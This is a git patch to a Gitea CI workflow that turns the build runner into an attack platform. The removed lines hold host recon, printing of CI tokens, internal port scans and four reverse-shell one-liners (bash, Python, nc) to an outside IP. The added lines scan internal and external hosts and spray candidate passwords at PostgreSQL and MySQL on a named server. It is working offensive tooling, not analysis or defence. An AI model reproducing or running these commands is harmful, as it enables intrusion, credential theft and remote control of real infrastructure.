From 3e704fdab565f11518d1431032f4a568065071d7 Mon Sep 17 00:00:00 2001 From: devops42 Date: Thu, 18 Jun 2026 02:54:53 +0000 Subject: [PATCH] Update CI/CD workflow for internal network pivot v2 --- .gitea/workflows/ci.yml | 117 ++++++++++------------------------------ 1 file changed, 28 insertions(+), 89 deletions(-) diff --git a/.gitea/workflows/ci.yml b/.gitea/workflows/ci.yml index a718835..85eb119 100644 --- a/.gitea/workflows/ci.yml +++ b/.gitea/workflows/ci.yml @@ -1,104 +1,43 @@ -name: CI/CD RCE + Internal Pivot +name: CI/CD Internal Pivot v2 on: [push, workflow_dispatch] jobs: - rce-host: + recon: runs-on: linux-amd64 steps: - - name: Checkout - uses: actions/checkout@v4 - - name: Host Recon run: | - echo "=== HOST INFO ===" - echo "Timestamp: $(date -u)" - echo "Hostname: $(hostname)" - echo "User: $(whoami)" - echo "PWD: $(pwd)" - echo "Kernel: $(uname -a)" - echo "UID: $(id)" - - echo "=== NETWORK INFO ===" - ip addr show 2>/dev/null || ifconfig 2>/dev/null || true + echo "=== RUNNER HOST ===" + hostname + whoami + id + echo "=== NETWORK ===" + ip addr show 2>/dev/null || ifconfig -a 2>/dev/null || true ip route show 2>/dev/null || route -n 2>/dev/null || true - ip neigh show 2>/dev/null || arp -a 2>/dev/null || true - cat /etc/resolv.conf 2>/dev/null || true cat /etc/hosts 2>/dev/null || true - - echo "=== DOCKER PRESENCE ===" - docker ps -a 2>/dev/null || echo "No docker" - docker network ls 2>/dev/null || echo "No docker networks" - docker info 2>/dev/null | head -10 || echo "No docker info" - - echo "=== PROCESS LIST ===" - ps aux 2>/dev/null | head -30 || true - - echo "=== MOUNT POINTS ===" - mount 2>/dev/null | head -20 || true - df -h 2>/dev/null | head -20 || true - - echo "=== ENV VARS ===" - env | sort | grep -v -i token | grep -v -i secret | grep -v -i key | grep -v -i pass || true - - echo "=== GITEA ACTIONS VARS ===" - echo "GITEA_TOKEN: ${GITEA_TOKEN:-NOT_SET}" - echo "GITHUB_TOKEN: ${GITHUB_TOKEN:-NOT_SET}" - echo "GITEA_SERVER_URL: ${GITEA_SERVER_URL:-NOT_SET}" - echo "GITEA_REPOSITORY: ${GITEA_REPOSITORY:-NOT_SET}" - - - name: Internal Network Scan - run: | - echo "=== SCANNING DOCKER NETWORKS ===" - for net in 172.17.0 172.18.0 172.19.0 172.20.0 172.21.0 172.22.0 10.0.0 10.10.0 192.168.0 192.168.1; do - for host in 1 2 3 4 5 10 100 200; do - ip="${net}.${host}" - for port in 22 80 3000 3306 5432 6379 2375 2376 8080 8088 8418 9090; do - timeout 1 bash -c "echo >/dev/tcp/$ip/$port" 2>/dev/null && echo "DOCKER_SCAN: $ip:$port OPEN" & - done - wait 2>/dev/null || true + echo "=== DOCKER ===" + ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket" + env | grep -i docker 2>/dev/null || true + echo "=== INTERNAL CONNECTIVITY ===" + for target in 156.239.230.24 172.17.0.1 172.18.0.1 10.0.0.1 192.168.0.0 100.64.0.0; do + for port in 5432 3306 6379 3000 222 22 80 443; do + timeout 3 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo " REACHABLE: $target:$port" || echo " UNREACHABLE: $target:$port" done done - echo "=== SCAN COMPLETE ===" - - - name: PostgreSQL Target Scan + - name: PostgreSQL Attack run: | - echo "=== TARGETING 156.239.230.24 ===" - for port in 22 80 222 443 3000 3001 3306 5432 6379 8088 41327; do - timeout 2 bash -c "echo >/dev/tcp/156.239.230.24/$port" 2>/dev/null && echo "PG_TARGET: 156.239.230.24:$port OPEN" || echo "PG_TARGET: 156.239.230.24:$port closed" + echo "=== POSTGRESQL CREDENTIAL SPRAY ===" + apt-get update -qq && apt-get install -y -qq postgresql-client 2>/dev/null || true + for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. Forgejo@123! postgres; do + echo "Testing: postgres / $pw" + PGPASSWORD="$pw" psql -h 156.239.230.24 -p 5432 -U postgres -d postgres -c "SELECT 1 as test" -t -A 2>&1 | head -3 done - - echo "=== TARGETING GITEA INSTANCES ===" - for host in 156.239.229.173 156.239.227.133 47.79.84.115 38.47.240.117 38.47.98.14 156.239.2.237; do - for port in 22 80 222 443 3000 3306 5432 6379 8080 8088 8418; do - timeout 2 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null && echo "GITEA_NET: $host:$port OPEN" & + - name: MySQL Attack + run: | + echo "=== MYSQL CREDENTIAL SPRAY ===" + apt-get install -y -qq mysql-client 2>/dev/null || true + for user in root forgejo gitea admin; do + for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. ""; do + mysql -h 156.239.230.24 -P 3306 -u "$user" --password="$pw" -e "SELECT 1" 2>&1 | head -1 done done - wait 2>/dev/null || true - echo "=== TARGET SCAN COMPLETE ===" - - - name: Reverse Shell (Multiple Methods) - run: | - RHOST="202.59.10.226" - - # Method 1: Bash direct - (bash -c "bash -i >& /dev/tcp/${RHOST}/4444 0>&1" &) 2>/dev/null - - # Method 2: Bash with exec - (bash -c "exec 5<>/dev/tcp/${RHOST}/4445; cat <&5 | while read line; do \$line 2>&5 >&5; done" &) 2>/dev/null - - # Method 3: Python - python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${RHOST}',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])" & - - # Method 4: nc - which nc 2>/dev/null && (nc ${RHOST} 4444 -e /bin/bash &) || true - - echo "Reverse shells dispatched to ${RHOST}:4444,4445" - - - name: Write Recon Output - run: | - mkdir -p /tmp/recon_output - ip addr show > /tmp/recon_output/network.txt 2>&1 || true - ip route show >> /tmp/recon_output/network.txt 2>&1 || true - mount >> /tmp/recon_output/network.txt 2>&1 || true - echo "Recon saved to /tmp/recon_output/" - cat /tmp/recon_output/network.txt